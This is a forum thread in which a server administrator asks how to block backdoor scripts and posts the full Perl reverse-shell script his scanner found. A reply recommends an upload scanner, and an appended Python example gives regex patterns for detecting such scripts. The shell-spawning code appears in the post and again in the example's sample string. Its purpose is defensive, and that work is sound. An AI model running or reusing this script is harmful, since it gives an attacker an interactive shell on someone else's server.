Block certain suspicious files

saurabhnsonar
Junior Member
Posts: 2
Joined: 11 Sep 2011, 13:54

Block certain suspicious files

Post by saurabhnsonar »

I have got an alert from csf regarding a suspicious file bc.pl on the server with the following content.

#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);

This gives direct access to the shell of the server. Can someone suggest how I can stop this kind of backdoor connect script from working, rather than checking an alert and manually deleting the file every time I get one?
Please help with some suggestions to block this kind of hacking attack.

Thank you!
Sergio
Junior Member
Posts: 1693
Joined: 12 Dec 2006, 14:56

Re: Block certain suspicious files

Post by Sergio »

Using CXS is the best way of blocking this. CXS checks every file uploaded to the server and deletes the file on the fly.

Sergio
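An added example (not code from this thread, nor from csf or cxs) of the kind of content check an upload scanner runs against a file like the one quoted above: it flags only the combination of behaviours the posted script shows, so an ordinary Perl socket client is not reported. It assumes nothing beyond the Python standard library; the two Perl samples are constructed for the demo.

```python
import re
from pathlib import Path
# A Perl script using Socket or calling connect() is normal on its own; the rule in
# is_reverse_shell() needs the full shape of the posted script: connect out, dup the
# standard streams onto the socket, then spawn an interactive shell.
INDICATORS = [
    ("socket_module", re.compile(r"^\s*use\s+Socket\b", re.M)),
    ("outbound_connect", re.compile(r"\bconnect\s*\(")),
    ("stdio_dup_to_socket", re.compile(r"open\s*\(\s*STD(IN|OUT|ERR)\s*,\s*[\"']>&")),
    ("interactive_shell", re.compile(r"\b(system|exec)\s*\(.{0,5}/bin/(ba|da)?sh\s+-i")),
]

def scan_content(text):
    """Return the names of every indicator that matches the script text, in order."""
    return [name for name, rx in INDICATORS if rx.search(text)]

def is_reverse_shell(text):
    """Flag only when the three behavioural indicators occur together."""
    needed = {"outbound_connect", "stdio_dup_to_socket", "interactive_shell"}
    return needed <= set(scan_content(text))

def scan_directory(root):
    # Walk root and return {path: indicators} for every file that trips the rule.
    flagged = {}
    for p in Path(root).rglob("*"):
        if p.is_file():
            try:
                text = p.read_text(errors="replace")
            except OSError:
                continue
            if is_reverse_shell(text):
                flagged[str(p)] = scan_content(text)
    return flagged

# Constructed samples (not files taken from any server): a benign socket client
# and the shape of the script quoted in the post.
BENIGN = """#!/usr/bin/perl
use Socket;
socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die;
connect(S, sockaddr_in(80, inet_aton('example.com'))) || die;
print S "GET / HTTP/1.0\\r\\n\\r\\n";
"""
SUSPICIOUS = """#!/usr/bin/perl
use Socket;
connect(SOCKET, $paddr) || die("Error: $!\\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
"""
```

Run scan_directory() over an upload or web root to get a map of flagged paths; pattern checks like this are a complement to, not a replacement for, the signature and quarantine handling a tool such as cxs provides.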